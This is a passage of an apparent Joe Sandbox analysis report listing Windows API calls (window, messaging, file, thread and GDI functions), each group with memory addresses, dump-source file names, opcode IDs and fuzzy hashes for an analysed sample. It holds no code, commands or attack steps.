                                                                                                                                                                        • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 002CE92F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcslen$ExtentPoint32Text
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3763101759-0
                                                                                                                                                                        • Opcode ID: beaab2607c2f02c097e0b3bc6ef17c3b9815a733e50ba99366938225ccc116b3
                                                                                                                                                                        • Instruction ID: 6a126fbaf737b75db528308b5cfc15ed397ae2248ec7a0cfa5996303a263d0e4
                                                                                                                                                                        • Opcode Fuzzy Hash: beaab2607c2f02c097e0b3bc6ef17c3b9815a733e50ba99366938225ccc116b3
                                                                                                                                                                        • Instruction Fuzzy Hash: BD212775D11215AFDF10BFA4C982BAEB7F8EF45320F154169E804BB281D6709E61CBA1
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetFileAttributesW.KERNEL32(?,002FDC30), ref: 002CDBA6
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 002CDBB5
                                                                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 002CDBC4
                                                                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,002FDC30), ref: 002CDC21
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2267087916-0
                                                                                                                                                                        • Opcode ID: f9f1ce31d266009949f41d46e72e0eb74e9c5d3156fcd5aeecbae15e453126e1
                                                                                                                                                                        • Instruction ID: 80e290ec3d13fb4c8b8fa3e763007a1f70954cd7fd79a96e09fe9f532fe53ae1
                                                                                                                                                                        • Opcode Fuzzy Hash: f9f1ce31d266009949f41d46e72e0eb74e9c5d3156fcd5aeecbae15e453126e1
                                                                                                                                                                        • Instruction Fuzzy Hash: 8121A3301242059F8300DF24C984EABB7E8EE5A764F100B2EF499C72A1D770DE56DF82
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 002F32A6
                                                                                                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 002F32C0
                                                                                                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 002F32CE
                                                                                                                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 002F32DC
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$Long$AttributesLayered
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2169480361-0
                                                                                                                                                                        • Opcode ID: d3862e090b22129bde45e4f417994b457fc708dbe644307fe923d554eea63adc
                                                                                                                                                                        • Instruction ID: ff43e3f9939bbedd39a5fc1613134c2ed7379a4ce613de1302c21d415e9a04a7
                                                                                                                                                                        • Opcode Fuzzy Hash: d3862e090b22129bde45e4f417994b457fc708dbe644307fe923d554eea63adc
                                                                                                                                                                        • Instruction Fuzzy Hash: 3121F431215115AFD714EF24CC45F7ABB99AF81364F248268F9268B2D2C771ED91CBD0
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 002C96E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,002C8271,?,000000FF,?,002C90BB,00000000,?,0000001C,?,?), ref: 002C96F3
                                                                                                                                                                          • Part of subcall function 002C96E4: lstrcpyW.KERNEL32(00000000,?,?,002C8271,?,000000FF,?,002C90BB,00000000,?,0000001C,?,?,00000000), ref: 002C9719
• Part of subcall function 002C96E4: lstrcmpiW.KERNEL32(00000000,?,002C8271,?,000000FF,?,002C90BB,00000000,?,0000001C,?,?), ref: 002C974A
• lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,002C90BB,00000000,?,0000001C,?,?,00000000), ref: 002C828A
• lstrcpyW.KERNEL32(00000000,?,?,002C90BB,00000000,?,0000001C,?,?,00000000), ref: 002C82B0
• lstrcmpiW.KERNEL32(00000002,cdecl,?,002C90BB,00000000,?,0000001C,?,?,00000000), ref: 002C82EB
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: lstrcmpilstrcpylstrlen
• String ID: cdecl
• API String ID: 4031866154-3896280584
• Opcode ID: 7cfb4cc23571a6a4531d5d4f60f224e73f5c27a29d4417ed03e44d0870ffef7e
• Instruction ID: 766f68a686be7a1d1422a7d08b31602439fa1af1bfa8ed9a315c4e99cb455297
• Opcode Fuzzy Hash: 7cfb4cc23571a6a4531d5d4f60f224e73f5c27a29d4417ed03e44d0870ffef7e
• Instruction Fuzzy Hash: 6C11D33A210282ABCB15AF38DC49E7A77A9FF45760B50812EF946C7290EF319821D791
APIs
• SendMessageW.USER32(?,00001060,?,00000004), ref: 002F615A
• _wcslen.LIBCMT ref: 002F616C
• _wcslen.LIBCMT ref: 002F6177
• SendMessageW.USER32(?,00001002,00000000,?), ref: 002F62B5
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: MessageSend_wcslen
• String ID:
• API String ID: 455545452-0
• Opcode ID: 32bf3463d39605083ae6a8d2a6635170debbefa5e294b30b3cad10e123575f59
• Instruction ID: e07b89953dacded627d588740fbcedfadd17a9dae46b90d311b812d9ea2fb6d0
• Opcode Fuzzy Hash: 32bf3463d39605083ae6a8d2a6635170debbefa5e294b30b3cad10e123575f59
• Instruction Fuzzy Hash: F511D23592021DA6DB10AF609C88AFFF7BCEB12790F104136FB0596181E7B48964CB60
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f555d94fc610e8103c8db8f6d270b053a4464d3b5d5bbe5b476cc0a47d80373e
• Instruction ID: c1dd44de221971c137cfcd792c12c44cd30b378d0067f94c7f1a4e2dbaec97ff
• Opcode Fuzzy Hash: f555d94fc610e8103c8db8f6d270b053a4464d3b5d5bbe5b476cc0a47d80373e
• Instruction Fuzzy Hash: 8D018FB2235216BEEE212A78BCC1F67760DDF613B8B300325B521A11D1DA608C689570
APIs
• SendMessageW.USER32(?,000000B0,?,?), ref: 002C2394
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 002C23A6
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 002C23BC
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 002C23D7
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 38db583cc8a81794e641aff3bb831294a611669322a478686b404ee610aa6797
• Instruction ID: 9bd6336afed75cbaec3fa451a810054f8d644f349b4e8fda084d250575b01886
• Opcode Fuzzy Hash: 38db583cc8a81794e641aff3bb831294a611669322a478686b404ee610aa6797
• Instruction Fuzzy Hash: 2B11093A900219FFEB11DBA5CD85F9DFB78FB08750F200195EA01B7290DA716E54DB94
APIs
• GetCurrentThreadId.KERNEL32 ref: 002CEB14
• MessageBoxW.USER32(?,?,?,?), ref: 002CEB47
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 002CEB5D
• CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 002CEB64
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: CloseCurrentHandleMessageObjectSingleThreadWait
• String ID:
• API String ID: 2880819207-0
• Opcode ID: 7821b5a4d10ed6d4fdd01c3e28ac8357bc2cae44dc741d5faf121a25e35e6267
• Instruction ID: 6f51730a679b737515bc2386f7c8d3c83517cc8ae34bc36f33cce3d521de8135
• Opcode Fuzzy Hash: 7821b5a4d10ed6d4fdd01c3e28ac8357bc2cae44dc741d5faf121a25e35e6267
• Instruction Fuzzy Hash: D2112F759102157BCB019F68AC4AFAF7F6DAB45374F014359F415D32D0D6748D0487A0
APIs
• CreateThread.KERNEL32(00000000,?,0028D369,00000000,00000004,00000000), ref: 0028D588
• GetLastError.KERNEL32 ref: 0028D594
• __dosmaperr.LIBCMT ref: 0028D59B
• ResumeThread.KERNEL32(00000000), ref: 0028D5B9
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: Thread$CreateErrorLastResume__dosmaperr
• String ID:
• API String ID: 173952441-0
• Opcode ID: 4b04b2e41e4b3024767336d8441b5b2b480c422431f37034191f9e5b6576356b
• Instruction ID: d331a92e594fe8bd799ced4210fe2e13b5cf0ba644bd5089d105dd956b1e3734
• Opcode Fuzzy Hash: 4b04b2e41e4b3024767336d8441b5b2b480c422431f37034191f9e5b6576356b
• Instruction Fuzzy Hash: A901DB7A432115BBDB107F65EC09BAA7B6DEF41335F100216F525861D0DB708928DBA1
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 002678B1
• GetStockObject.GDI32(00000011), ref: 002678C5
• SendMessageW.USER32(00000000,00000030,00000000), ref: 002678CF
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: CreateMessageObjectSendStockWindow
• String ID:
• API String ID: 3970641297-0
• Opcode ID: 9fa6b2c85b7000b494bec2180400f4614a28c492cf36d38e09f24b8c66894442
• Instruction ID: a280bf7567b8f942839ec45bbdeb31b3ad059741075842bf9a9406370b159884
• Opcode Fuzzy Hash: 9fa6b2c85b7000b494bec2180400f4614a28c492cf36d38e09f24b8c66894442
• Instruction Fuzzy Hash: 5811AD72515109BFDF025F90EC58EEABB69FF097A8F040125FA0456120D731DCA0FBA0
                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,0029338D,00000364,00000000,00000000,00000000,?,002935FE,00000006,FlsSetValue), ref: 00293418
                                                                                                                                                                        • GetLastError.KERNEL32(?,0029338D,00000364,00000000,00000000,00000000,?,002935FE,00000006,FlsSetValue,00303260,FlsSetValue,00000000,00000364,?,002931B9), ref: 00293424
                                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0029338D,00000364,00000000,00000000,00000000,?,002935FE,00000006,FlsSetValue,00303260,FlsSetValue,00000000), ref: 00293432
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3177248105-0
                                                                                                                                                                        • Opcode ID: 693f4309420697702b958a1a6ab7c7088a9a345c7bc191365905ab5fc6b21ae0
                                                                                                                                                                        • Instruction ID: 74d5e0e165096e213c2160f030cf8cb7ab34ebd64198c1d1910d5de44f54de2b
                                                                                                                                                                        • Opcode Fuzzy Hash: 693f4309420697702b958a1a6ab7c7088a9a345c7bc191365905ab5fc6b21ae0
                                                                                                                                                                        • Instruction Fuzzy Hash: 530184366712279BCF23CF79AC489677B99AF45BB1B221630F90AD7181D720D911C6E0
                                                                                                                                                                        APIs
                                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,002CB69A,?,00008000), ref: 002CBA8B
                                                                                                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,002CB69A,?,00008000), ref: 002CBAB0
                                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,002CB69A,?,00008000), ref: 002CBABA
                                                                                                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,002CB69A,?,00008000), ref: 002CBAED
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2875609808-0
                                                                                                                                                                        • Opcode ID: 617b7a3a44150d1246ae4ebfa7887001368fff9d1d9726a65d3e80a2534070ae
                                                                                                                                                                        • Instruction ID: aab6d776ea3ae79e93e4ebbc5fbc98d9d37b22ecd85e2cf6fcb207163d2ca964
                                                                                                                                                                        • Opcode Fuzzy Hash: 617b7a3a44150d1246ae4ebfa7887001368fff9d1d9726a65d3e80a2534070ae
                                                                                                                                                                        • Instruction Fuzzy Hash: 49115E31C1052DE7CF01DFA5E94ABEEBB78BF09711F104199D985B2140DB705660CBA5
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 002F888E
                                                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 002F88A6
                                                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 002F88CA
                                                                                                                                                                        • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 002F88E5
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 357397906-0
                                                                                                                                                                        • Opcode ID: 73ff36480e91744fda323e1679e06dd60f8569879d25096f94d46e4a20430949
                                                                                                                                                                        • Instruction ID: 6c41626ed3796cea4e7199271fbe3fc752ee19132076c565f5d0499ab553f2c0
                                                                                                                                                                        • Opcode Fuzzy Hash: 73ff36480e91744fda323e1679e06dd60f8569879d25096f94d46e4a20430949
                                                                                                                                                                        • Instruction Fuzzy Hash: 681143B9D0020EAFDB41CF98D884AEEBBB9FB08350F504166E915E2210D735AA54CF50
                                                                                                                                                                        APIs
                                                                                                                                                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 002C3712
                                                                                                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 002C3723
                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 002C372A
                                                                                                                                                                        • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 002C3731
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2710830443-0
                                                                                                                                                                        • Opcode ID: 8e1e2b14c9c556f94b5744281686ec253f8476303d0fd4219705cd199f741693
                                                                                                                                                                        • Instruction ID: 0724c14afc228f83ba7d102ed4b1857a8adaf257673e6d351a1f60c0ba8d1435
                                                                                                                                                                        • Opcode Fuzzy Hash: 8e1e2b14c9c556f94b5744281686ec253f8476303d0fd4219705cd199f741693
                                                                                                                                                                        • Instruction Fuzzy Hash: 9BE06DB1151224BADB205BA2AC4DFFBBF6DEB42BF1F000529F109D6080DAA58944D6B0
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00261F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00261F87
                                                                                                                                                                          • Part of subcall function 00261F2D: SelectObject.GDI32(?,00000000), ref: 00261F96
                                                                                                                                                                          • Part of subcall function 00261F2D: BeginPath.GDI32(?), ref: 00261FAD
                                                                                                                                                                          • Part of subcall function 00261F2D: SelectObject.GDI32(?,00000000), ref: 00261FD6
                                                                                                                                                                        • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 002F92E3
                                                                                                                                                                        • LineTo.GDI32(?,?,?), ref: 002F92F0
                                                                                                                                                                        • EndPath.GDI32(?), ref: 002F9300
                                                                                                                                                                        • StrokePath.GDI32(?), ref: 002F930E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1539411459-0
                                                                                                                                                                        • Opcode ID: 3494549ad5cd365287ee96354465e7b28dc0ffa9bcca4f907febe426f2c3e30c
                                                                                                                                                                        • Instruction ID: 8e6e17acaea93f26022433fb36edb61e401a1718e746d45d1c9cdb0918078239
                                                                                                                                                                        • Opcode Fuzzy Hash: 3494549ad5cd365287ee96354465e7b28dc0ffa9bcca4f907febe426f2c3e30c
                                                                                                                                                                        • Instruction Fuzzy Hash: 50F05E31015259BADB125F54AC0EFDE3F5AAF0A364F048054FA15210E1C7755571DFE5
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetSysColor.USER32(00000008), ref: 002621BC
                                                                                                                                                                        • SetTextColor.GDI32(?,?), ref: 002621C6
                                                                                                                                                                        • SetBkMode.GDI32(?,00000001), ref: 002621D9
                                                                                                                                                                        • GetStockObject.GDI32(00000005), ref: 002621E1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Color$ModeObjectStockText
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4037423528-0
APIs
• GetDesktopWindow.USER32 ref: 002BEC36
• GetDC.USER32(00000000), ref: 002BEC40
• GetDeviceCaps.GDI32(00000000,0000000C), ref: 002BEC60
• ReleaseDC.USER32(?), ref: 002BEC81
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
